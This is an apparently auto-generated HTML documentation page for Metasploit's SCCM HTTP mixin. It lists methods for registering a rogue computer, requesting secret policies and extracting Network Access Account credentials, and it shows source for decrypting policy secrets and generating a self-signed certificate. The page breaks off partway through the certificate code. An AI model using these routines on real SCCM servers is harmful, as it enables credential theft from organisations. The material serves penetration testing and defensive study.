metasploit-gs/api/Msf/Exploit/Remote/HTTP/SCCM.html
<!DOCTYPE html>
<html>
<head>
  <!--
    Document head of the generated YARD page for Msf::Exploit::Remote::HTTP::SCCM.
    All stylesheets and scripts are loaded from paths relative to the docs root
    (four directory levels up); no third-party origin is referenced here.
  -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Module: Msf::Exploit::Remote::HTTP::SCCM &mdash; Documentation by YARD 0.9.37</title>
  <link rel="stylesheet" href="../../../../css/style.css">
  <link rel="stylesheet" href="../../../../css/common.css">
  <!--
    pathId and relpath are assigned without a declaration, so they become
    page-wide globals. Presumably js/app.js reads them; confirm before renaming.
  -->
  <script>
    pathId = "Msf::Exploit::Remote::HTTP::SCCM";
    relpath = '../../../../';
  </script>
  <script src="../../../../js/jquery.js"></script>
  <script src="../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../_index.html">Index (S)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../HTTP.html" title="Msf::Exploit::Remote::HTTP (module)">HTTP</a></span></span>
&raquo;
<span class="title">SCCM</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HTTP::SCCM
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span>, <span class='object_link'><a href="../HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">Msf::Exploit::Remote::HttpClient</a></span>, <span class='object_link'><a href="../../Retry.html" title="Msf::Exploit::Retry (module)">Msf::Exploit::Retry</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http/sccm.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module provides a way of interacting with SCCM (Microsoft System Center Configuration Manager) servers.</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="KEY_SIZE-constant" class="">KEY_SIZE =
</dt>
<dd><pre class="code"><span class='int'>2048</span></pre></dd>
<dt id="SECRET_POLICY_FLAG-constant" class="">SECRET_POLICY_FLAG =
</dt>
<dd><pre class="code"><span class='int'>4</span></pre></dd>
</dl>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">Msf::Exploit::Remote::HttpClient</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../HttpClient.html#client-instance_method" title="Msf::Exploit::Remote::HttpClient#client (method)">#client</a></span>, <span class='object_link'><a href="../HttpClient.html#cookie_jar-instance_method" title="Msf::Exploit::Remote::HttpClient#cookie_jar (method)">#cookie_jar</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#deobfuscate_policy_value-instance_method" title="#deobfuscate_policy_value (instance method)">#<strong>deobfuscate_policy_value</strong>(value) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#generate_key_and_cert-instance_method" title="#generate_key_and_cert (instance method)">#<strong>generate_key_and_cert</strong>(subject) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Create a self-signed private key and certificate for our computer registration.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_creds_from_policy_doc-instance_method" title="#get_creds_from_policy_doc (instance method)">#<strong>get_creds_from_policy_doc</strong>(policy) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Extract obfuscated credentials from the resulting policy XML document.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_naa_credentials-instance_method" title="#get_naa_credentials (instance method)">#<strong>get_naa_credentials</strong>(opts, management_point, site_code, computer_user) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_secret_policies-instance_method" title="#get_secret_policies (instance method)">#<strong>get_secret_policies</strong>(http_opts, management_point, site_code, key, cert, sms_id, computer_user) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#make_ms_pubkey-instance_method" title="#make_ms_pubkey (instance method)">#<strong>make_ms_pubkey</strong>(pub_key) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Make a pubkey structure (<a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb">learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb</a>).</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#mscrypt_derive_key_sha1-instance_method" title="#mscrypt_derive_key_sha1 (instance method)">#<strong>mscrypt_derive_key_sha1</strong>(secret) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#register_request-instance_method" title="#register_request (instance method)">#<strong>register_request</strong>(http_opts, management_point, key, cert, computer_user) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Make a request to the SCCM server to register our computer.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#report_creds-instance_method" title="#report_creds (instance method)">#<strong>report_creds</strong>(ip_address, user, password) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#request_policy-instance_method" title="#request_policy (instance method)">#<strong>request_policy</strong>(http_opts, policy_url, sms_id, key) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Request the policy from the policy_url.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#rsa_sign-instance_method" title="#rsa_sign (instance method)">#<strong>rsa_sign</strong>(key, data) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Sign the data using the RSA key, and reverse it (strange, but it's what's required).</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">Msf::Exploit::Remote::HttpClient</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../HttpClient.html#basic_auth-instance_method" title="Msf::Exploit::Remote::HttpClient#basic_auth (method)">#basic_auth</a></span>, <span class='object_link'><a href="../HttpClient.html#cleanup-instance_method" title="Msf::Exploit::Remote::HttpClient#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../HttpClient.html#configure_http_login_scanner-instance_method" title="Msf::Exploit::Remote::HttpClient#configure_http_login_scanner (method)">#configure_http_login_scanner</a></span>, <span class='object_link'><a href="../HttpClient.html#connect-instance_method" title="Msf::Exploit::Remote::HttpClient#connect (method)">#connect</a></span>, <span class='object_link'><a href="../HttpClient.html#connect_ws-instance_method" title="Msf::Exploit::Remote::HttpClient#connect_ws (method)">#connect_ws</a></span>, <span class='object_link'><a href="../HttpClient.html#deregister_http_client_options-instance_method" title="Msf::Exploit::Remote::HttpClient#deregister_http_client_options (method)">#deregister_http_client_options</a></span>, <span class='object_link'><a href="../HttpClient.html#disconnect-instance_method" title="Msf::Exploit::Remote::HttpClient#disconnect (method)">#disconnect</a></span>, <span class='object_link'><a href="../HttpClient.html#download-instance_method" title="Msf::Exploit::Remote::HttpClient#download (method)">#download</a></span>, <span class='object_link'><a href="../HttpClient.html#full_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#full_uri (method)">#full_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#handler-instance_method" title="Msf::Exploit::Remote::HttpClient#handler (method)">#handler</a></span>, <span class='object_link'><a href="../HttpClient.html#http_fingerprint-instance_method" title="Msf::Exploit::Remote::HttpClient#http_fingerprint (method)">#http_fingerprint</a></span>, <span class='object_link'><a 
href="../HttpClient.html#initialize-instance_method" title="Msf::Exploit::Remote::HttpClient#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../HttpClient.html#lookup_http_fingerprints-instance_method" title="Msf::Exploit::Remote::HttpClient#lookup_http_fingerprints (method)">#lookup_http_fingerprints</a></span>, <span class='object_link'><a href="../HttpClient.html#normalize_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#normalize_uri (method)">#normalize_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#path_from_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#path_from_uri (method)">#path_from_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#peer-instance_method" title="Msf::Exploit::Remote::HttpClient#peer (method)">#peer</a></span>, <span class='object_link'><a href="../HttpClient.html#proxies-instance_method" title="Msf::Exploit::Remote::HttpClient#proxies (method)">#proxies</a></span>, <span class='object_link'><a href="../HttpClient.html#reconfig_redirect_opts!-instance_method" title="Msf::Exploit::Remote::HttpClient#reconfig_redirect_opts! 
(method)">#reconfig_redirect_opts!</a></span>, <span class='object_link'><a href="../HttpClient.html#request_opts_from_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_opts_from_url (method)">#request_opts_from_url</a></span>, <span class='object_link'><a href="../HttpClient.html#request_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_url (method)">#request_url</a></span>, <span class='object_link'><a href="../HttpClient.html#rhost-instance_method" title="Msf::Exploit::Remote::HttpClient#rhost (method)">#rhost</a></span>, <span class='object_link'><a href="../HttpClient.html#rport-instance_method" title="Msf::Exploit::Remote::HttpClient#rport (method)">#rport</a></span>, <span class='object_link'><a href="../HttpClient.html#send_request_cgi-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_cgi (method)">#send_request_cgi</a></span>, <span class='object_link'><a href="../Http
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Kerberos/ServiceAuthenticator/Options.html" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options (module)">Kerberos::ServiceAuthenticator::Options</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Kerberos/ServiceAuthenticator/Options.html#kerberos_auth_options-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_auth_options (method)">#kerberos_auth_options</a></span>, <span class='object_link'><a href="../Kerberos/ServiceAuthenticator/Options.html#kerberos_clock_skew_seconds-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_clock_skew_seconds (method)">#kerberos_clock_skew_seconds</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Kerberos/Ticket/Storage.html" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage (module)">Kerberos::Ticket::Storage</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Kerberos/Ticket/Storage.html#initialize-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../Kerberos/Ticket/Storage.html#kerberos_storage_options-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_storage_options (method)">#kerberos_storage_options</a></span>, <span class='object_link'><a href="../Kerberos/Ticket/Storage.html#kerberos_ticket_storage-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_ticket_storage (method)">#kerberos_ticket_storage</a></span>, <span class='object_link'><a href="../Kerberos/Ticket/Storage.html#store_ccache-class_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache (method)">store_ccache</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Auxiliary/LoginScanner.html" title="Msf::Auxiliary::LoginScanner (module)">Auxiliary::LoginScanner</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Auxiliary/LoginScanner.html#configure_login_scanner-instance_method" title="Msf::Auxiliary::LoginScanner#configure_login_scanner (method)">#configure_login_scanner</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? 
(method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span 
class='object_link'><a href="../../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#rep
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Retry.html" title="Msf::Exploit::Retry (module)">Msf::Exploit::Retry</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Retry.html#retry_until_truthy-instance_method" title="Msf::Exploit::Retry#retry_until_truthy (method)">#retry_until_truthy</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<!--
  Rendered YARD entry for the instance method deobfuscate_policy_value(value).
  The source carries no docstring; the listing below is lines 290 to 303 of
  lib/msf/core/exploit/remote/http/sccm.rb.

  What the listed Ruby does, step by step:
    1. Strips every character that is not a hex digit from value and packs the
       remaining hex text into a binary string (pack 'H*').
    2. Reads bytes 52..55 of that binary string with unpack('I') and uses the
       result as data_length.
    3. Slices data_length bytes starting at offset 64 as the ciphertext buffer.
    4. Passes bytes 4..43 (40 bytes) to mscrypt_derive_key_sha1 to obtain the
       key. That helper's body is not part of this listing.
    5. Decrypts the buffer with OpenSSL cipher 'des-ede3-cbc' using an IV of
       eight zero bytes.
    6. Reinterprets the plaintext as UTF-16LE and returns it encoded as UTF-8.

  Security-relevant reading: the key material is taken from the blob itself
  and the IV is a constant, so the value is obfuscated rather than protected.
  Anything that can read the policy value can recover the plaintext;
  confidentiality depends on who is allowed to fetch the policy, not on the
  cipher.

  NOTE(review): 'I' is Ruby's native-endian unsigned int directive. If the
  length field is little-endian on the wire (presumably, TODO confirm), 'V'
  would state that explicitly and behave the same on every platform.
  NOTE(review): there is no length check on the decoded blob before the
  fixed-offset slices, so a short or malformed value presumably raises here
  instead of returning; callers are not shown in this listing.
-->
<h3 class="signature first" id="deobfuscate_policy_value-instance_method">
#<strong>deobfuscate_policy_value</strong>(value) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
290
291
292
293
294
295
296
297
298
299
300
301
302
303</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 290</span>
<span class='kw'>def</span> <span class='id identifier rubyid_deobfuscate_policy_value'>deobfuscate_policy_value</span><span class='lparen'>(</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span>
<span class='id identifier rubyid_value'>value</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>[^0-9A-Fa-f]</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_data_length'>data_length</span> <span class='op'>=</span> <span class='id identifier rubyid_value'>value</span><span class='lbracket'>[</span><span class='int'>52</span><span class='op'>..</span><span class='int'>55</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>I</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_buffer'>buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_value'>value</span><span class='lbracket'>[</span><span class='int'>64</span><span class='op'>..</span><span class='int'>64</span> <span class='op'>+</span> <span class='id identifier rubyid_data_length'>data_length</span> <span class='op'>-</span> <span class='int'>1</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='id identifier rubyid_mscrypt_derive_key_sha1'>mscrypt_derive_key_sha1</span><span class='lparen'>(</span><span class='id identifier rubyid_value'>value</span><span class='lbracket'>[</span><span class='int'>4</span><span class='op'>..</span><span class='int'>43</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_iv'>iv</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span> <span class='op'>*</span> <span class='int'>8</span>
<span class='id identifier rubyid_cipher'>cipher</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Cipher</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>des-ede3-cbc</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_decrypt'>decrypt</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_iv'>iv</span> <span class='op'>=</span> <span class='id identifier rubyid_iv'>iv</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>=</span> <span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_update'>update</span><span class='lparen'>(</span><span class='id identifier rubyid_buffer'>buffer</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_final'>final</span>
<span class='id identifier rubyid_result'>result</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="generate_key_and_cert-instance_method">
#<strong>generate_key_and_cert</strong>(subject) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Create a self-signed private key and certificate for our computer registration</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 330</span>
<span class='kw'>def</span> <span class='id identifier rubyid_generate_key_and_cert'>generate_key_and_cert</span><span class='lparen'>(</span><span class='id identifier rubyid_subject'>subject</span><span class='rparen'>)</span>
<span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>PKey</span><span class='op'>::</span><span class='const'>RSA</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="#KEY_SIZE-constant" title="Msf::Exploit::Remote::HTTP::SCCM::KEY_SIZE (constant)">KEY_SIZE</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_cert'>cert</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>X509</span><span class='op'>::</span><span class='const'>Certificate</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_version'>version</span> <span class='op'>=</span> <span class='int'>2</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_serial'>serial</span> <span class='op'>=</span> <span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>0xFFFFFFFF</span><span class='rparen'>)</span> <span class='op'>&lt;&lt;</span> <span class='int'>32</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>0xFFFFFFFF</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_public_key'>public_key</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_public_key'>public_key</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_issuer'>issuer</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>X509</span><span class='op'>::</span><span class='const'>Name</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='lbracket'>[</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CN</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_subject'>subject</span><span class='rbracket'>]</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_subject'>subject</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>X509</span><span class='op'>::</span><span class='const'>Name</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='lbracket'>[</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CN</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_subject'>subject</span><span class='rbracket'>]</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_yr'>yr</span> <span class='op'>=</span> <span class='int'>24</span> <span class='op'>*</span> <span class='int'>3600</span> <span class='op'>*</span> <span class='int'>365</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_not_before'>not_before</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_at'>at</span><span class='lparen'>(</span><span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span> <span class='op'>-</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='id identifier rubyid_yr'>yr</span> <span class='op'>*</span> <span class='int'>3</span><span class='rparen'>)</span> <span class='op'>-</span> <span class='id identifier rubyid_yr'>yr</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_not_after'>not_after</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_at'>at</span><span class='lparen'>(</span><span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_not_before'>not_before</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span> <span class='op'>+</span> <span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>4</span><span class='op'>..</span><span class='int'>9</span><span class='rparen'>)</span> <span class='op'>*</span> <span class='id identifier rubyid_yr'>yr</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ef'>ef</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>X509</span><span class='op'>::</span><span class='const'>ExtensionFactory</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_ef'>ef</span><span class='period'>.</span><span class='id identifier rubyid_subject_certificate'>subject_certificate</span> <span class='op'>=</span> <span class='id identifier rubyid_cert'>cert</span>
<span class='id identifier rubyid_ef'>ef</span><span class='period'>.</span><span class='id identifier rubyid_issuer_certificate'>issuer_certificate</span> <span class='op'>=</span> <span class='id identifier rubyid_cert'>cert</span>
